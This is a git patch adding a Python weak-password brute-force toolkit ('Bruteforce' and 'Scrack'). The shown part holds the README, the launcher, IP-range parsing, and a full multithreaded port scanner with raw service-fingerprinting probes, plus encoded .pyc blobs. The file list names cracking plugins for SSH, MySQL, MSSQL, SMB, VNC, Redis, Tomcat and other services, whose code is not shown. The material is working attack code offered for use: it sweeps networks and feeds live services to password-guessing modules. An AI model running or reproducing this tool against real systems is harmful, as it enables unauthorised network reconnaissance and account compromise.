From ec86a1a1e3c0c8e31dcdca3cacb0ebd62007c343 Mon Sep 17 00:00:00 2001 From: InfoSec <1241112575@qq.com> Date: Tue, 3 Apr 2018 01:39:21 +0800 Subject: [PATCH] =?UTF-8?q?=E6=9A=B4=E5=8A=9B=E7=A0=B4=E8=A7=A3?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 暴力破解小脚本 --- Bruteforce/README.md | 23 + Bruteforce/bruteforce.py | 53 ++ Bruteforce/comm/__init__.py | 0 Bruteforce/comm/__init__.pyc | Bin 0 -> 129 bytes Bruteforce/comm/config.py | 45 ++ Bruteforce/comm/config.pyc | Bin 0 -> 1855 bytes Bruteforce/comm/portscan.py | 294 ++++++++++ Bruteforce/comm/portscan.pyc | Bin 0 -> 10369 bytes Bruteforce/comm/printers.py | 78 +++ Bruteforce/comm/printers.pyc | Bin 0 -> 3280 bytes Bruteforce/conf/.DS_Store | Bin 0 -> 6148 bytes Bruteforce/conf/.svn/all-wcprops | 11 + Bruteforce/conf/.svn/entries | 62 +++ .../conf/.svn/text-base/config.txt.svn-base | 7 + Bruteforce/conf/ftp.conf | 72 +++ Bruteforce/conf/ldapd.conf | 27 + Bruteforce/conf/mongodb.conf | 115 ++++ Bruteforce/conf/mssql.conf | 33 ++ Bruteforce/conf/mysql.conf | 75 +++ Bruteforce/conf/pop3.conf | 0 Bruteforce/conf/postgres.conf | 64 +++ Bruteforce/conf/signs.conf | 80 +++ Bruteforce/conf/smb.conf | 67 +++ Bruteforce/conf/snmp.conf | 1 + Bruteforce/conf/ssh.conf | 86 +++ Bruteforce/conf/tomcat.conf | 69 +++ Bruteforce/conf/vnc.conf | 34 ++ Bruteforce/conf/web.conf | 69 +++ Bruteforce/factorys/__init__.py | 1 + Bruteforce/factorys/__init__.pyc | Bin 0 -> 150 bytes Bruteforce/factorys/pluginFactory.py | 101 ++++ Bruteforce/factorys/pluginFactory.pyc | Bin 0 -> 4320 bytes Bruteforce/plugins/.DS_Store | Bin 0 -> 6148 bytes Bruteforce/plugins/__init__.py | 1 + Bruteforce/plugins/__init__.pyc | Bin 0 -> 171 bytes Bruteforce/plugins/ftp.py | 76 +++ Bruteforce/plugins/ftp.pyc | Bin 0 -> 3147 bytes Bruteforce/plugins/ldapd.py | 86 +++ Bruteforce/plugins/ldapd.pyc | Bin 0 -> 3353 bytes Bruteforce/plugins/mongodb.py | 101 ++++ Bruteforce/plugins/mongodb.pyc | Bin 0 -> 3718 bytes Bruteforce/plugins/mssql.py | 67 +++ Bruteforce/plugins/mssql.pyc | Bin 0 -> 2889 bytes Bruteforce/plugins/mysql.py | 80 +++ Bruteforce/plugins/mysql.pyc | Bin 0 -> 3269 bytes Bruteforce/plugins/ndr.pyc | Bin 0 -> 51798 bytes Bruteforce/plugins/pop3.py | 61 ++ Bruteforce/plugins/pop3.pyc | Bin 0 -> 2301 bytes Bruteforce/plugins/postgres.py | 73 +++ Bruteforce/plugins/postgres.pyc | Bin 0 -> 2631 bytes Bruteforce/plugins/printers.pyc | Bin 0 -> 3380 bytes Bruteforce/plugins/redisexp.py | 66 +++ Bruteforce/plugins/redisexp.pyc | Bin 0 -> 2744 bytes Bruteforce/plugins/rsync.py | 97 ++++ Bruteforce/plugins/rsync.pyc | Bin 0 -> 4561 bytes Bruteforce/plugins/rsynclib.py | 194 +++++++ Bruteforce/plugins/rsynclib.pyc | Bin 0 -> 5937 bytes Bruteforce/plugins/rsyncs.pyc | Bin 0 -> 9732 bytes Bruteforce/plugins/smb.py | 72 +++ Bruteforce/plugins/smb.pyc | Bin 0 -> 3146 bytes Bruteforce/plugins/snmp.py | 65 +++ Bruteforce/plugins/snmp.pyc | Bin 0 -> 3157 bytes Bruteforce/plugins/ssh.py | 84 +++ Bruteforce/plugins/ssh.pyc | Bin 0 -> 3377 bytes Bruteforce/plugins/ssltest.py | 145 +++++ Bruteforce/plugins/ssltest.pyc | Bin 0 -> 5557 bytes Bruteforce/plugins/tomcat.pyc | Bin 0 -> 2789 bytes Bruteforce/plugins/vnc.py | 74 +++ Bruteforce/plugins/vnc.pyc | Bin 0 -> 2958 bytes Bruteforce/plugins/vnclib.py | 97 ++++ Bruteforce/plugins/vnclib.pyc | Bin 0 -> 3325 bytes Bruteforce/plugins/web.py | 119 ++++ Bruteforce/plugins/web.pyc | Bin 0 -> 4219 bytes Bruteforce/requirements.txt | 12 + Bruteforce/result/.DS_Store | Bin 0 -> 6148 bytes Scrack/README.md | 24 + Scrack/Scrack.py | 521 ++++++++++++++++++ 77 files changed, 3582 insertions(+) create mode 100644 Bruteforce/README.md create mode 100644 Bruteforce/bruteforce.py create mode 100644 Bruteforce/comm/__init__.py create mode 100644 Bruteforce/comm/__init__.pyc create mode 100644 Bruteforce/comm/config.py create mode 100644 Bruteforce/comm/config.pyc create mode 100644 Bruteforce/comm/portscan.py create mode 100644 Bruteforce/comm/portscan.pyc create mode 100644 Bruteforce/comm/printers.py create mode 100644 Bruteforce/comm/printers.pyc create mode 100644 Bruteforce/conf/.DS_Store create mode 100644 Bruteforce/conf/.svn/all-wcprops create mode 100644 Bruteforce/conf/.svn/entries create mode 100644 Bruteforce/conf/.svn/text-base/config.txt.svn-base create mode 100644 Bruteforce/conf/ftp.conf create mode 100644 Bruteforce/conf/ldapd.conf create mode 100644 Bruteforce/conf/mongodb.conf create mode 100644 Bruteforce/conf/mssql.conf create mode 100644 Bruteforce/conf/mysql.conf create mode 100644 Bruteforce/conf/pop3.conf create mode 100644 Bruteforce/conf/postgres.conf create mode 100644 Bruteforce/conf/signs.conf create mode 100644 Bruteforce/conf/smb.conf create mode 100644 Bruteforce/conf/snmp.conf create mode 100644 Bruteforce/conf/ssh.conf create mode 100644 Bruteforce/conf/tomcat.conf create mode 100644 Bruteforce/conf/vnc.conf create mode 100644 Bruteforce/conf/web.conf create mode 100644 Bruteforce/factorys/__init__.py create mode 100644 Bruteforce/factorys/__init__.pyc create mode 100644 Bruteforce/factorys/pluginFactory.py create mode 100644 Bruteforce/factorys/pluginFactory.pyc create mode 100644 Bruteforce/plugins/.DS_Store create mode 100644 Bruteforce/plugins/__init__.py create mode 100644 Bruteforce/plugins/__init__.pyc create mode 100644 Bruteforce/plugins/ftp.py create mode 100644 Bruteforce/plugins/ftp.pyc create mode 100644 Bruteforce/plugins/ldapd.py create mode 100644 Bruteforce/plugins/ldapd.pyc create mode 100644 Bruteforce/plugins/mongodb.py create mode 100644 Bruteforce/plugins/mongodb.pyc create mode 100644 Bruteforce/plugins/mssql.py create mode 100644 Bruteforce/plugins/mssql.pyc create mode 100644 Bruteforce/plugins/mysql.py create mode 100644 Bruteforce/plugins/mysql.pyc create mode 100644 Bruteforce/plugins/ndr.pyc create mode 100644 Bruteforce/plugins/pop3.py create mode 100644 Bruteforce/plugins/pop3.pyc create mode 100644 Bruteforce/plugins/postgres.py create mode 100644 Bruteforce/plugins/postgres.pyc create mode 100644 Bruteforce/plugins/printers.pyc create mode 100644 Bruteforce/plugins/redisexp.py create mode 100644 Bruteforce/plugins/redisexp.pyc create mode 100644 Bruteforce/plugins/rsync.py create mode 100644 Bruteforce/plugins/rsync.pyc create mode 100644 Bruteforce/plugins/rsynclib.py create mode 100644 Bruteforce/plugins/rsynclib.pyc create mode 100644 Bruteforce/plugins/rsyncs.pyc create mode 100644 Bruteforce/plugins/smb.py create mode 100644 Bruteforce/plugins/smb.pyc create mode 100644 Bruteforce/plugins/snmp.py create mode 100644 Bruteforce/plugins/snmp.pyc create mode 100644 Bruteforce/plugins/ssh.py create mode 100644 Bruteforce/plugins/ssh.pyc create mode 100644 Bruteforce/plugins/ssltest.py create mode 100644 Bruteforce/plugins/ssltest.pyc create mode 100644 Bruteforce/plugins/tomcat.pyc create mode 100644 Bruteforce/plugins/vnc.py create mode 100644 Bruteforce/plugins/vnc.pyc create mode 100644 Bruteforce/plugins/vnclib.py create mode 100644 Bruteforce/plugins/vnclib.pyc create mode 100644 Bruteforce/plugins/web.py create mode 100644 Bruteforce/plugins/web.pyc create mode 100644 Bruteforce/requirements.txt create mode 100644 Bruteforce/result/.DS_Store create mode 100644 Scrack/README.md create mode 100644 Scrack/Scrack.py diff --git a/Bruteforce/README.md b/Bruteforce/README.md new file mode 100644 index 0000000..e39c5fa --- /dev/null +++ b/Bruteforce/README.md @@ -0,0 +1,23 @@ +# bruteforce weak password +# ports&*weak password scanner. + +$ python bruteforce.py -h + + +usage: main.py [-h] [--ip IP] [--threads THREADS] [--P ISPING] + [--p USER_PORTS] [--file FILE] + + + +optional arguments: + -h, --help show this help message and exit + + --ip IP ip like 192.168.1.0/24 or 192.168.0.0/16 + + --threads THREADS Maximum threads, default 50 + + --P ISPING --P not mean no ping frist,default yes + + --p USER_PORTS --p scan ports;like 21,80,445 or 22-1000 + + --file FILE get ips or domains for this file diff --git a/Bruteforce/bruteforce.py b/Bruteforce/bruteforce.py new file mode 100644 index 0000000..5f603a4 --- /dev/null +++ b/Bruteforce/bruteforce.py @@ -0,0 +1,53 @@ +#coding=utf-8 +__author__ = 'unkonwn' +import argparse +from comm.printers import printPink,printRed,printGreen +from comm.config import * +from comm.portscan import * +from factorys.pluginFactory import * + + +#实例化config类 +c=config() + +if __name__ == '__main__': + #接受cmd参数 + parser = argparse.ArgumentParser(description='ports&*weak password scanner. teams:xdsec. author: wilson ') + parser.add_argument('--ip',action="store",required=False,dest="ip",type=str,help='ip like 192.168.1.0/24 or 192.168.0.0/16') + parser.add_argument("--threads",action="store",required=False,dest="threads",type=int,default=50,help='Maximum threads, default 50') + parser.add_argument("--P",action="store",required=False,dest="isping",type=str,default='yes',help='--P not mean no ping frist,default yes') + parser.add_argument("--p",action="store",required=False,dest="user_ports",type=str,default='',help='--p scan ports;like 21,80,445 or 22-1000') + parser.add_argument("--file",action="store",required=False,dest="file",type=str,help='get ips or domains for this file') + + args = parser.parse_args() + ip = args.ip + filename=args.file + + + #获取ip列表 + if ip: + ips=c.getips(ip) + file="result/%s.txt" %args.ip.replace("/","") + elif filename: + ips=c.file2list(filename) + filename=filename.split("/")[-1] + file="result/%s.txt" %filename + else: + print "error args";exit() + + isping=args.isping + user_posts=args.user_ports + threads=args.threads + + p=portscan(c,user_posts) + p.run(isping,threads,ips,file) + + #print p.ipdict,p.pinglist + plugins=pluginFactory(c) + for pluginname in plugins.pluginList: + #print pluginname + if pluginname: + pluginname.run(p.ipdict,p.pinglist,threads,file) + + + diff --git a/Bruteforce/comm/__init__.py b/Bruteforce/comm/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/Bruteforce/comm/__init__.pyc b/Bruteforce/comm/__init__.pyc new file mode 100644 index 0000000000000000000000000000000000000000..4d7c2e8cb8e2f4374cf10fdb19635ae34987c07b GIT binary patch literal 129 zcmZSn%*&P7;UAvN00oRd+5w1*S%5?e14FO|NW@PANHCxg#aciy7ps``%#w`Kq?iEL z;E_{_Y_lK6PNg31yOpmLks{FKt1R6CHN#X!se0Dc=9 AKmY&$ literal 0 HcmV?d00001 diff --git a/Bruteforce/comm/config.py b/Bruteforce/comm/config.py new file mode 100644 index 0000000..0dd00e4 --- /dev/null +++ b/Bruteforce/comm/config.py @@ -0,0 +1,45 @@ +#coding=utf-8 +__author__ = 'wilson' +from IPy import IP +from comm.printers import printPink,printRed,printGreen + +class config(object): + + def getips(self,ip): + iplist=[] + try: + if "-" in ip.split(".")[3]: + startnum=int(ip.split(".")[3].split("-")[0]) + endnum=int(ip.split(".")[3].split("-")[1]) + for i in range(startnum,endnum): + iplist.append("%s.%s.%s.%s" %(ip.split(".")[0],ip.split(".")[1],ip.split(".")[2],i)) + else: + ips=IP(ip) + for i in ips: + iplist.append(str(i)) + + return iplist + + except: + printRed("[!] not a valid ip given. you should put ip like 192.168.1.0/24, 192.168.0.0/16,192.168.0.1-200") + exit() + + + def file2list(self,file): + iplist=[] + try: + fh = open(file) + for ip in fh.readlines(): + ip=ip.strip() + iplist.append(ip) + fh.close() + return iplist + except Exception, e: + print e + exit() + + + def write_file(self,file,contents): + f2 = open(file,'a+') + f2.write(contents) + f2.close() \ No newline at end of file diff --git a/Bruteforce/comm/config.pyc b/Bruteforce/comm/config.pyc new file mode 100644 index 0000000000000000000000000000000000000000..b4040d8bf8f048e977d7a57ea96bb84aee06689a GIT binary patch literal 1855 zcmbtVQEwYX5T3m|J5EU2A|PNmY}h@W2y)jsL)3;2rp8E>097A+ zVxj@8qS&KE(afWPM~Z!)5}#%P4FZ}~Xi%Y9l?GL;1*F$#jED;TLUcy-{h&s1mHN#! zBy?4nXC|>(YW~KjsraD>^LVexrQJGAUYOMFne^DzR$i!Mx3O{_6V5s9FJWLdlz{oM5i8|{KfAr6-_~dM`zM` z{kTfS@8tfyz)?z~0;(hU)c^0ON*NW<;x}et>C-ZxGmjoT`I1g6wDf2Syw$4!kopQB zB)Q_R!LQIbplu*fKmJVnX`5WYNf=U<7Po0xMUDDp4ToYCUY1w>pna6?@278&QVK-J zHCb?LyrC*p^c`sJH+ipmpn+&dY|HqV8w@i1)V>7swr#Ec4KrP?L5@B5tawNEddKSi&l4Z~8WGpf@ zxx8wS);f`=by4Bc`AnW8A5S@@DXZqT35UeU^ufmm6XTBNhX;EP``;cM7IUY^SuxTF zqii;VVMVv{6UhgpCb!&;y~$}*Rr#u}-of9t`pVl>Tk3VM=J{$viH!Mpaof8X_9vKg z8TZK1N&r4Bc35gt>^4CLx9Ak&2xtm@L-d%7>{yAcpF0o(g5jZjDT`YafXd?yD(0l1 zQw8lj`T~GC`H;b9mc6n!+Y`YCpGQO!^QJd;zuv}BuRYi?_ ztS}D#-o>!*!ju&A1>o_?FDV9NOd~tOuZsEPFzTLV8@(r&P{_rEfoFwrI;_KOas}x* ze3MsM29SpXkGAZ)`=ZVARVsys+%ki=OfaFlE!AWNNwwiHjb?f{l&g0*oMrJmfg8St zfbcCgcVI3-$n3dP9&#-%E%mG3`m5{LdUCOx*No=wC@TPgseZh7QXW^91Rs}{{8Z?| lhRmg$-jG?7!;>9O^~gzu{{vB&_@wOpQ!Z0NRX5a4?;m~EVO{_L literal 0 HcmV?d00001 diff --git a/Bruteforce/comm/portscan.py b/Bruteforce/comm/portscan.py new file mode 100644 index 0000000..690de9e --- /dev/null +++ b/Bruteforce/comm/portscan.py @@ -0,0 +1,294 @@ +#coding=utf-8 +__author__ = 'wilson' +import sys +sys.path.append("../") +from comm.config import * +from comm.printers import printPink,printRed,printGreen + +import threading +from threading import Thread +from Queue import Queue +import platform +from subprocess import Popen, PIPE +import re +import time +import socket +socket.setdefaulttimeout(10) #设置了全局默认超时时间 + +class portscan(): + + """docstring for ClassName""" + def __init__(self,c,user_ports): + self.config=c + self.PROBES =[ + '\r\n\r\n', + 'GET / HTTP/1.0\r\n\r\n', + 'GET / \r\n\r\n', + '\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08', + '\x80\0\0\x28\x72\xFE\x1D\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xA0\0\x01\x97\x7C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', + '\x03\0\0\x0b\x06\xe0\0\0\0\0\0', + '\0\0\0\xa4\xff\x53\x4d\x42\x72\0\0\0\0\x08\x01\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x40\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1.0\0\x02MICROSOFT NETWORKS 1.03\0\x02MICROSOFT NETWORKS 3.0\0\x02LANMAN1.0\0\x02LM1.2X002\0\x02Samba\0\x02NT LANMAN 1.0\0\x02NT LM 0.12\0', + '\x80\x9e\x01\x03\x01\x00u\x00\x00\x00 \x00\x00f\x00\x00e\x00\x00d\x00\x00c\x00\x00b\x00\x00:\x00\x009\x00\x008\x00\x005\x00\x004\x00\x003\x00\x002\x00\x00/\x00\x00\x1b\x00\x00\x1a\x00\x00\x19\x00\x00\x18\x00\x00\x17\x00\x00\x16\x00\x00\x15\x00\x00\x14\x00\x00\x13\x00\x00\x12\x00\x00\x11\x00\x00\n\x00\x00\t\x00\x00\x08\x00\x00\x06\x00\x00\x05\x00\x00\x04\x00\x00\x03\x07\x00\xc0\x06\x00@\x04\x00\x80\x03\x00\x80\x02\x00\x80\x01\x00\x80\x00\x00\x02\x00\x00\x01\xe4i<+\xf6\xd6\x9b\xbb\xd3\x81\x9f\xbf\x15\xc1@\xa5o\x14,M \xc4\xc7\xe0\xb6\xb0\xb2\x1f\xf9)\xe8\x98', + '\x16\x03\0\0S\x01\0\0O\x03\0?G\xd7\xf7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb<=\xdbo\xef\x10n\0\0(\0\x16\0\x13\0\x0a\0f\0\x05\0\x04\0e\0d\0c\0b\0a\0`\0\x15\0\x12\0\x09\0\x14\0\x11\0\x08\0\x06\0\x03\x01\0', + '< NTP/1.2 >\n', + '< NTP/1.1 >\n', + '< NTP/1.0 >\n', + '\0Z\0\0\x01\0\0\0\x016\x01,\0\0\x08\0\x7F\xFF\x7F\x08\0\0\0\x01\0 \0:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\04\xE6\0\0\0\x01\0\0\0\0\0\0\0\0(CONNECT_DATA=(COMMAND=version))', + '\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x01\x55\x00\x00\x00\x4d\x53\x53\x51\x4c\x53\x65\x72\x76\x65\x72\x00\x48\x0f\x00\x00', + '\0\0\0\0\x44\x42\x32\x44\x41\x53\x20\x20\x20\x20\x20\x20\x01\x04\0\0\0\x10\x39\x7a\0\x01\0\0\0\0\0\0\0\0\0\0\x01\x0c\0\0\0\0\0\0\x0c\0\0\0\x0c\0\0\0\x04', + '\x01\xc2\0\0\0\x04\0\0\xb6\x01\0\0\x53\x51\x4c\x44\x42\x32\x52\x41\0\x01\0\0\x04\x01\x01\0\x05\0\x1d\0\x88\0\0\0\x01\0\0\x80\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x08\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x01\0\0\x40\0\0\0\x40\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x04\0\0\0\x02\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x80\0\0\0\x01\x08\0\0\0\x01\0\0\x40\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x10\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x04\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x40\0\0\0\x01\x09\0\0\0\x01\0\0\x80\0\0\0\x01\x04\0\0\0\x03\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\x01\x04\0\0\x01\0\0\x80\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\x40\0\0\0\x01\0\0\0\0\x01\0\0\x40\0\0\0\0\x20\x20\x20\x20\x20\x20\x20\x20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xe4\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x7f', + '\x41\0\0\0\x3a\x30\0\0\xff\xff\xff\xff\xd4\x07\0\0\0\0\0\0test.$cmd\0\0\0\0\0\xff\xff\xff\xff\x1b\0\0\0\x01serverStatus\0\0\0\0\0\0\0\xf0\x3f\0' + ] + self.SIGNS =self.config.file2list("conf/signs.conf") + self.ports=[] + self.getports(user_ports) + self.lock = threading.Lock() + self.pinglist=[] + self.q=Queue() + self.sp=Queue() + self.signs=self.prepsigns() + + self.ipdict={} + self.ipdict['ldap']=[] + self.ipdict['mysql']=[] + self.ipdict['mssql']=[] + self.ipdict['ftp']=[] + self.ipdict['ssh']=[] + self.ipdict['smb']=[] + self.ipdict['vnc']=[] + self.ipdict['pop3']=[] + self.ipdict['rsync']=[] + self.ipdict['http']=[] + self.ipdict['https']=[] + self.ipdict['mongodb']=[] + self.ipdict['postgres']=[] + self.ipdict['redis']=[] + self.ipdict['ssl']=[] + self.ipdict['Unknown']=[] + + + #获取扫描端口列表 + def getports(self,user_ports): + if user_ports=='': + self.ports=[21,22,23,80,81,443,389,445,843,873,1043,1099,1194,1433,1434,1521,2601,2604,3306,3307,3128,3389,3812,4440,4848,5432,5900,5901,5902,5903,6082,6000,6379,7001,7002,8080,8181,8888,8090,8000,8008,8009,8081,8088,8089,9000,9080,9043,9090,9091,9200,9528,10000,11211,10022,15000,16000,22022,22222,27017,28017,17017,18017,11321,50060] + else: + try: + if user_ports.find(",")>0: + for port in user_ports.split(','): + self.ports.append(int(port)) + + elif user_ports.find("-")>0: + startport=int(user_ports.split('-')[0]) + endport=int(user_ports.split('-')[1]) + for i in xrange(startport,endport+1): + self.ports.append(i) + else: + self.ports.append(int(user_ports)) + except : + printRed('[!] not a valid ports given. you should put ip like 22,80,1433 or 22-1000') + exit() + + #ping扫描函数 + def pinger(self): + while True: + ip=self.q.get() + if platform.system()=='Linux': + p=Popen(['ping','-c 2',ip],stdout=PIPE) + m = re.search('(\d)\sreceived', p.stdout.read()) + try: + if m.group(1)!='0': + self.pinglist.append(ip) + self.lock.acquire() + printRed("%s is live!!\r\n" % ip) + self.lock.release() + except:pass + + if platform.system()=='Darwin': + import commands + p=commands.getstatusoutput("ping -c 2 "+ip) + m = re.findall('ttl', p[1]) + try: + if m: + self.pinglist.append(ip) + self.lock.acquire() + printRed("%s is live!!\r\n" % ip) + self.lock.release() + except:pass + + if platform.system()=='Windows': + p=Popen('ping -n 2 ' + ip, stdout=PIPE) + m = re.findall('TTL', p.stdout.read()) + if m: + self.pinglist.append(ip) + self.lock.acquire() + printRed("%s is live!!\r\n" % ip) + self.lock.release() + self.q.task_done() + + + def pingscan(self,isping,threads,ips): + starttime=time.time() + friststarttime=time.time() + print "[*] start Scanning at %s" % time.ctime() + #isping=='no' 就禁ping扫描 + #默认ping 扫描 + if isping=='yes': + print "Scanning for live machines..." + for i in xrange(threads): + t = Thread(target=self.pinger) + t.setDaemon(True) + t.start() + for ip in ips: + self.q.put(ip) + + self.q.join() + + else: + self.pinglist=ips + + if len(self.pinglist)==0: + print "not find any live machine - -|||" + exit() + + print "[*] Scanning for live machines done,it has Elapsed time:%s " % (time.time()-starttime) + + + + def prepsigns(self): + signlist=[] + for item in self.SIGNS: + (label,pattern)=item.split('|',2) + sign=(label,pattern) + signlist.append(sign) + return signlist + + def matchbanner(self,banner,slist): + #print banner + for item in slist: + p=re.compile(item[1]) + #print item[1] + if p.search(banner)!=None: + return item[0] + return 'Unknown' + + + #扫端口及其对应服务类型函数 + def scanports(self): + while True: + ip,port=self.sp.get() + #print ip,port + s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + #判断端口的服务类型 + service='Unknown' + try: + s.connect((ip,port)) + except: + self.sp.task_done() + continue + + try: + result = s.recv(256) + service=self.matchbanner(result,self.signs) + except: + for probe in self.PROBES: + #print probe + try: + s.close() + sd=socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sd.settimeout(5) + sd.connect((ip,port)) + sd.send(probe) + except: + continue + try: + result=sd.recv(256) + service=self.matchbanner(result,self.signs) + if service!='Unknown': + break + except: + continue + + if service not in self.ipdict: + self.ipdict[service]=[] + self.ipdict[service].append(ip+':'+str(port)) + self.lock.acquire() + printRed("%s opening %s\r\n" %(ip,port)) + self.lock.release() + else: + self.ipdict[service].append(ip+':'+str(port)) + self.lock.acquire() + printRed("%s opening %s\r\n" %(ip,port)) + self.lock.release() + + self.sp.task_done() + + + def portsscan(self,threads,file): + print "Scanning ports now..." + print "[*] start Scanning live machines' ports at %s" % time.ctime() + starttime=time.time() + + for i in xrange(threads): + st=Thread(target=self.scanports) + st.setDaemon(True) + st.start() + + for scanip in self.pinglist: + for port in self.ports: + self.sp.put((scanip,port)) + self.sp.join() + print "[*] Scanning ports done,it has Elapsed time:%s " % (time.time()-starttime) + #将服务端口 信息 记录文件 + for name in self.ipdict.keys(): + if len(self.ipdict[name]): + contents=str(name)+' service has:\n'+' '+str(self.ipdict[name])+'\n' + self.config.write_file(contents=contents,file=file) + + + #处理没有识别的服务 + def handleunknown(self): + for ip in self.ipdict['Unknown']: + #print ip + try: + if str(ip).split(':')[1]=='389': + self.ipdict['ldap'].append(ip) + if str(ip).split(':')[1]=='445': + self.ipdict['smb'].append(ip) + if str(ip).split(':')[1] in ['3306','3307','3308','3309']: + self.ipdict['mysql'].append(ip) + if str(ip).split(':')[1]=='1433': + self.ipdict['mssql'].append(ip) + if str(ip).split(':')[1] in ['10022','22']: + self.ipdict['ssh'].append(ip) + if str(ip).split(':')[1]=='27017': + self.ipdict['mongodb'].append(ip) + if str(ip).split(':')[1]=='110': + self.ipdict['pop3'].append(ip) + if str(ip).split(':')[1]=='5432': + self.ipdict['postgres'].append(ip) + if str(ip).split(':')[1]=='443': + self.ipdict['ssl'].append(ip) + if str(ip).split(':')[1]=='873': + self.ipdict['rsync'].append(ip) + if str(ip).split(':')[1]=='6379': + self.ipdict['redis'].append(ip) +# if str(ip).split(':')[1]=='21': +# self.ipdict['ftp'].append(ip) + except Exception as e: + print e + #处理被识别为http的mongo + for ip in self.ipdict['http']: + if str(ip).split(':')[1]=='27017': + self.ipdict['http'].remove(ip) + self.ipdict['mongodb'].append(ip) + + def run(self,isping,threads,ips,file): + self.pingscan(isping,threads,ips) + self.portsscan(threads,file) + self.handleunknown() + + + + + + diff --git a/Bruteforce/comm/portscan.pyc b/Bruteforce/comm/portscan.pyc new file mode 100644 index 0000000000000000000000000000000000000000..cb8e5bab7cab36a96a66e242ad728215846ae049 GIT binary patch literal 10369 zcmb_iYiu0Xbv`r8_gfSndTZoZ7G+a>%6eI{Ns$z#TBPJz+LUQ4>*dan9CBaW8A@bI z)w1OVZIPx)3)D`Gy7^H9ef$YhAZQY_jokn)P{94sGzDs)hzlbq60~+;Bt?Ft?)RO$ zORnfg)mXcnv**6gz4x4RzjKGN_Z#aPUw;3IloUTP{0`v>{|&?wnE|!Lvn6fGj3vG$ zi?%Gr#EZ!-ODvXENV-C%$W=gcjm*@TTIiuxW@@#!D)N~+nW-~n z)sn84Oufw1Z`5s&nFg&}Bk4xTG|5bpWSV8Bd80;)%(Rqb+a@#HN_?x#w2I#jhtBHd1(91KPtLS)Lh-IfOfjkgxgMm$TsHUspUIFb(9_e~WwDgx{w`)kwIKOI zkc}<}*`=talyZG9sw*YN3%;K2&PX~LhLg#RpW?Fc*@kBX zPxu80x^Bt3NTQ@RkjH~mkOz`L28@nzF(Ssoo-~TrBwn+4*vf4(zfId}4~s%g^IExs z>@X(t=p0N1>0+g<+q${fz{P5AE6Zw1m1+f>Qp~I`;~TVbW2vY~0@JX$*l-b|Y?sq! zC??v<6Yb@Rj`Bojd16O-VrO|`S9xN0d16m_VsCk3UwLAGdBQ1A94JrRBd0xqhJOaT zG8tBY!p!T!RxsmZQ%fJ@_C}H#$ET(y?8eVck*>o3?A;EQA6u-? ze@(0xvE(2Agw&guNPX20wJ`cqQ|C`Uh)Z;11ZIxxG>^gieEZ6RVt1%fAAv<2HD`^@Z`ksq_({{(cd$0rLS*5?07OW zn-qI;$}#1pb0#O8zMlR83BLxJZoXp0ELj2Ph|H{EcUR<9+$%^S}PBfBwV2zy9)%zW3JYGjHYIZOLNuAkcP*Fo&Tl z;6XghW>%8&45Vy@Ty2oB29jagVFNlp?M$kE3^)(h-Ime6HKPw1(UWMxlLF$1b?NUimE)BYBfQJR86dZRNQF z=tA>3aIwx1`SSdaW6*sxyh`pJoMv3`DRBpiY^`p|2V1i={SJlL`gt}QMi!q_eIh*E zzh7o{%YvhP|m=Cey3Uk<*i3Q%MtvAR9!91l+QOPq0U;){eo^f6}+XZntW!MynaL z0pDhusZaW*ID1Z!dN+b6{Jy222vBXwmcmPIUaxq4 z;`NI+Al{&ON5y+kykp`W7w?34C&fD@-b3P@7VnIB4~zGRcthe1i+5J$hZSv!WPc`W z|4PWW2t+zUJm!tcQiT-mvsV8`^D$Y?AHBLqZrF;xfZk#PH8KDWZLH;(HJ$xpsh_d3 zeqOOyQG*Vzl)n>AZkQg*3(koaRLJTm;q`h<)&V@vN#`wFMz40r4dh{H9eur0vE%Y{ z7`J0H+l+y$T9dWp3LHng>pXUMG6Io+N)_PDmwdG z$#<~%!EciMHOZrJ4M9M%9cmvuO7iC2L~MlEdv8b`uqC&y6Cf9%$fQJCmm!x z{!DL_O1)kfB@609)iI+x zE#Yi}yW-DWthtQi3HN~r{L(+dleJqN)?WClo%rsuI_+KXY;{(O!$PG96O2FlIdWFt zwV=3#pIWpCHKJQ0H!Q)t7b~dcMQ`;QEy*}67~#Cea#)jFmIYhJ>=qHuX(YB-D~lR% z!PsD%Yg4qpMZ|cl%)oCcCWXILOKXtDMw&EjjKenx;w%hlMTh}wSkh5ew9VL@$n^4S 